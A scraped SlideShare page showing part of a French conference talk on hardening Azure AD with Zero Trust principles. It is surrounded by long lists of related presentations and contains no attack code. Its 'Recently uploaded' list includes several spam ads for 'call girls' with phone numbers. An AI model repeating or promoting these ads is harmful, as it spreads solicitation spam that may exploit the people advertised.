Self-issued OpenID Provider_OpenID Foundation Virtual Workshop Self-issued OpenID Provider_OpenID Foundation Virtual Workshop
Self-issued OpenID Provider_OpenID Foundation Virtual Workshop
 
OpenID Connect for W3C Verifiable Credential Objects
OpenID Connect for W3C Verifiable Credential ObjectsOpenID Connect for W3C Verifiable Credential Objects
OpenID Connect for W3C Verifiable Credential Objects
 
MIM Synchronization Services 2016 -> une solution économique pour créer, modi...
MIM Synchronization Services 2016 -> une solution économique pour créer, modi...MIM Synchronization Services 2016 -> une solution économique pour créer, modi...
MIM Synchronization Services 2016 -> une solution économique pour créer, modi...
 

Similar to Appliquez le modèle Zero Trust pour le Hardening de votre Azure AD !

IdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
IdentityDays2022 - Gestion des privilèges sur le Cloud MicrosoftIdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
IdentityDays2022 - Gestion des privilèges sur le Cloud MicrosoftIdentity Days
 
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...Identity Days
 
Azure Community Tour 2019 - AZUGDK
Azure Community Tour 2019 - AZUGDKAzure Community Tour 2019 - AZUGDK
Azure Community Tour 2019 - AZUGDKPeter Selch Dahl
 
FIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
FIDO2 : vers la fin des mots de passe ? - Par Arnaud JumeletFIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
FIDO2 : vers la fin des mots de passe ? - Par Arnaud JumeletIdentity Days
 
What's new in Azure Active Directory and what's coming new ?
What's new in Azure Active Directory and what's coming new ?What's new in Azure Active Directory and what's coming new ?
What's new in Azure Active Directory and what's coming new ?Vignesh Ganesan I Microsoft MVP
 
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...Chirag Patel
 
Microsoft-Entra-Identity-and-Access-presentation.pdf
Microsoft-Entra-Identity-and-Access-presentation.pdfMicrosoft-Entra-Identity-and-Access-presentation.pdf
Microsoft-Entra-Identity-and-Access-presentation.pdfJohnDoe583546
 
SC-900+2022.pdf
SC-900+2022.pdfSC-900+2022.pdf
SC-900+2022.pdfRitish H
 
October 2022 CIAOPS Need to Know Webinar
October 2022 CIAOPS Need to Know WebinarOctober 2022 CIAOPS Need to Know Webinar
October 2022 CIAOPS Need to Know WebinarRobert Crane
 
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security ToolsTomasz Poszytek
 
Fundamentals of Microsoft 365 Security , Identity and Compliance
Fundamentals of Microsoft 365 Security , Identity and ComplianceFundamentals of Microsoft 365 Security , Identity and Compliance
Fundamentals of Microsoft 365 Security , Identity and ComplianceVignesh Ganesan I Microsoft MVP
 
Microsoft Azure News - Oct 2022
Microsoft Azure News - Oct 2022Microsoft Azure News - Oct 2022
Microsoft Azure News - Oct 2022Daniel Toomey
 
Azure Active Directory - An Introduction for Developers
Azure Active Directory - An Introduction for DevelopersAzure Active Directory - An Introduction for Developers
Azure Active Directory - An Introduction for DevelopersJohn Garland
 
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptxConfidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptxCarlo Sacchi
 
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ..."Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...Fwdays
 
Information Barriers in MS Teams
Information Barriers in MS TeamsInformation Barriers in MS Teams
Information Barriers in MS TeamsNanddeep Nachan
 
Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022Daniel Toomey
 
Azure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish KalamatiAzure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish KalamatiGirish Kalamati
 
Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022Daniel Toomey
 

Similar to Appliquez le modèle Zero Trust pour le Hardening de votre Azure AD ! (20)

IdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
IdentityDays2022 - Gestion des privilèges sur le Cloud MicrosoftIdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
IdentityDays2022 - Gestion des privilèges sur le Cloud Microsoft
 
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
Identity Days 2020 - Quelles sont les méthodes et le niveau de sécurisation/r...
 
Azure Community Tour 2019 - AZUGDK
Azure Community Tour 2019 - AZUGDKAzure Community Tour 2019 - AZUGDK
Azure Community Tour 2019 - AZUGDK
 
Securing your Azure Identity Infrastructure
Securing your Azure Identity InfrastructureSecuring your Azure Identity Infrastructure
Securing your Azure Identity Infrastructure
 
FIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
FIDO2 : vers la fin des mots de passe ? - Par Arnaud JumeletFIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
FIDO2 : vers la fin des mots de passe ? - Par Arnaud Jumelet
 
What's new in Azure Active Directory and what's coming new ?
What's new in Azure Active Directory and what's coming new ?What's new in Azure Active Directory and what's coming new ?
What's new in Azure Active Directory and what's coming new ?
 
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
Understanding Security and Compliance in Microsoft Teams - M365 Saturday Pune...
 
Microsoft-Entra-Identity-and-Access-presentation.pdf
Microsoft-Entra-Identity-and-Access-presentation.pdfMicrosoft-Entra-Identity-and-Access-presentation.pdf
Microsoft-Entra-Identity-and-Access-presentation.pdf
 
SC-900+2022.pdf
SC-900+2022.pdfSC-900+2022.pdf
SC-900+2022.pdf
 
October 2022 CIAOPS Need to Know Webinar
October 2022 CIAOPS Need to Know WebinarOctober 2022 CIAOPS Need to Know Webinar
October 2022 CIAOPS Need to Know Webinar
 
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
[PU&D] - Securing IT Against Modern Threats with Microsoft Cloud Security Tools
 
Fundamentals of Microsoft 365 Security , Identity and Compliance
Fundamentals of Microsoft 365 Security , Identity and ComplianceFundamentals of Microsoft 365 Security , Identity and Compliance
Fundamentals of Microsoft 365 Security , Identity and Compliance
 
Microsoft Azure News - Oct 2022
Microsoft Azure News - Oct 2022Microsoft Azure News - Oct 2022
Microsoft Azure News - Oct 2022
 
Azure Active Directory - An Introduction for Developers
Azure Active Directory - An Introduction for DevelopersAzure Active Directory - An Introduction for Developers
Azure Active Directory - An Introduction for Developers
 
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptxConfidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
 
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ..."Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
 
Information Barriers in MS Teams
Information Barriers in MS TeamsInformation Barriers in MS Teams
Information Barriers in MS Teams
 
Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022
 
Azure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish KalamatiAzure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish Kalamati
 
Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022
 

More from Identity Days

Live Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromisLive Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromisIdentity Days
 
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?Identity Days
 
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...Identity Days
 
Passwordless – de la théorie à la pratique
Passwordless – de la théorie à la pratiquePasswordless – de la théorie à la pratique
Passwordless – de la théorie à la pratiqueIdentity Days
 
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...Identity Days
 
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...Identity Days
 
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...Identity Days
 
Gérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant IntuneGérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant IntuneIdentity Days
 
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...Identity Days
 
Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...Identity Days
 
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...Identity Days
 
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure ADDémos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure ADIdentity Days
 
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NGSSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NGIdentity Days
 
Gestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptxGestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptxIdentity Days
 
Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...Identity Days
 
Nouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active DirectoryNouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active DirectoryIdentity Days
 
L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger ! L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger ! Identity Days
 
CIEM, tiens une nouvelle catégorie de produits identité?
CIEM, tiens une nouvelle catégorie de produits identité?CIEM, tiens une nouvelle catégorie de produits identité?
CIEM, tiens une nouvelle catégorie de produits identité?Identity Days
 
Mise en oeuvre du passwordless AD dans un environnement Hybride
Mise en oeuvre du passwordless AD dans un environnement HybrideMise en oeuvre du passwordless AD dans un environnement Hybride
Mise en oeuvre du passwordless AD dans un environnement HybrideIdentity Days
 
La politique de mots de passe : de la théorie à la pratique avec OpenLDAP
La politique de mots de passe : de la théorie à la pratique avec OpenLDAPLa politique de mots de passe : de la théorie à la pratique avec OpenLDAP
La politique de mots de passe : de la théorie à la pratique avec OpenLDAPIdentity Days
 

More from Identity Days (20)

Live Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromisLive Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromis
 
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
 
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
 
Passwordless – de la théorie à la pratique
Passwordless – de la théorie à la pratiquePasswordless – de la théorie à la pratique
Passwordless – de la théorie à la pratique
 
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
 
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
 
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
 
Gérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant IntuneGérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant Intune
 
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
 
Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...
 
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
 
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure ADDémos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
 
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NGSSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
 
Gestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptxGestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptx
 
Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...
 
Nouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active DirectoryNouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active Directory
 
L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger ! L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger !
 
CIEM, tiens une nouvelle catégorie de produits identité?
CIEM, tiens une nouvelle catégorie de produits identité?CIEM, tiens une nouvelle catégorie de produits identité?
CIEM, tiens une nouvelle catégorie de produits identité?
 
Mise en oeuvre du passwordless AD dans un environnement Hybride
Mise en oeuvre du passwordless AD dans un environnement HybrideMise en oeuvre du passwordless AD dans un environnement Hybride
Mise en oeuvre du passwordless AD dans un environnement Hybride
 
La politique de mots de passe : de la théorie à la pratique avec OpenLDAP
La politique de mots de passe : de la théorie à la pratique avec OpenLDAPLa politique de mots de passe : de la théorie à la pratique avec OpenLDAP
La politique de mots de passe : de la théorie à la pratique avec OpenLDAP
 

Recently uploaded

Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 

Recently uploaded (20)

Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 

Appliquez le modèle Zero Trust pour le Hardening de votre Azure AD !

  • 1. Merci à tous nos partenaires ! 27 octobre 2022 - PARIS @IdentityDays #identitydays2022
  • 2. Jean-François Apréa CEO and Founder AZ IT Consulting | IT & Cloud Architect | Microsoft Azure Specialist MVP Security | MVP Cloud and Datacenter Management (16) Author | Speaker | Trainer (MCT Alumni) Seyfallah Tagrerout CEO and Founder STC Consulting | Cloud and Security Architect Microsoft Azure Specialist | Microsoft Zero Trust Specialist MVP Azure and Enterprise Mobility (8) Author | Speaker | Trainer Apply the Zero Trust model for Hardening your Azure AD 27 octobre 2022 - PARIS
  • 3. Identity Days 2022 27 octobre 2022 - PARIS Zero Trust? It’s urgent to go, because it’s urgent to be really protected! • Azure AD & Microsoft Entra • Zero Trust and Microsoft vision • Azure AD is Identity and Access Control centric • Azure AD Kill Chain • Azure AD Hardening with Zero Trust in mind 😊 • Good practices and 12-step action plan Agenda
  • 4. Identity Days 2022 27 octobre 2022 - PARIS It becomes difficult to be up-to-date … Hackers don’t give a shit! Source : Jean-Charles Duret-Ferrari  About your project’s scope…  It’s managed buy a third party…  It’s a legacy system…  It’s too critical to patch…  You’ve always done in that way…  About your Go-Live date…  It’s only a Pilot/POC not production…  About NDA…  It was not a mandatory requirements…  It is a non-exposed internal system…  It is hard to change…  It is handled in the Cloud…  The vendor does not support this…  It is an interim solution…  It is encrypted on disk…  You cannot explain the Risk to the Business…  You have other priorities…  You don’t have a Business justification…  You cannot have ROI…  You contracted out that risk… Really, too many bad reasons!
  • 5. Azure AD & Microsoft Entra Identity Days 2022 27 octobre 2022 - PARIS
  • 6. Identity Days 2022 27 octobre 2022 - PARIS Azure Active Directory & Microsoft Entra Azure Active Directory  Identity & Access Management  Inter-connected ecosystem  Security  Hybrid Cloud  Several types of Identities Microsoft Entra • Azure Active Directory • Microsoft Entra Permissions Management • Microsoft Entra Verified ID • Microsoft Entra Workload Identities • Microsoft Entra Identity Governance
  • 8. About Zero Trust and Microsoft vision Identity Days 2022 27 octobre 2022 - PARIS
  • 9. Identity Days 2022 27 octobre 2022 - PARIS Verify explicitly Use least privileged access Assume breach Microsoft Zero Trust vision
  • 10. Identity Days 2022 27 octobre 2022 - PARIS Microsoft Zero Trust vision Assume breach Assume attackers can and will successfully attack anything (identity, network, device, app, infrastructure, etc.) and plan accordingly Transforms overall thinking, strategy, and architectures from “safe network” to “open network” Asset/Node = user, app, device, data, API, etc. Verify explicitly Protect assets against attacker control by explicitly validating that all trust and security decisions use all relevant available information and telemetry Reduces “attack surface” of each asset Use least privilege access Limit access of a potentially compromised asset, typically with just-in-time and just-enough-access (JIT/JEA) and risk- based polices like adaptive access control Reduce blast of compromises
  • 11. Azure AD is Identity and Access Control centric Identity Days 2022 27 octobre 2022 - PARIS
  • 12. Identity Days 2022 27 octobre 2022 - PARIS Azure AD Access Control plane Verification of each access attempt Access control to Apps and Data Azure AD signals Never trust, always verify…
  • 13. Identity Days 2022 27 octobre 2022 - PARIS Azure AD Access Control
  • 14. Azure AD Kill Chain ✨😯 Identity Days 2022 27 octobre 2022 - PARIS
  • 15. Identity Days 2022 Azure AD Kill Chain How to get started 😊 27 octobre 2022 - PARIS
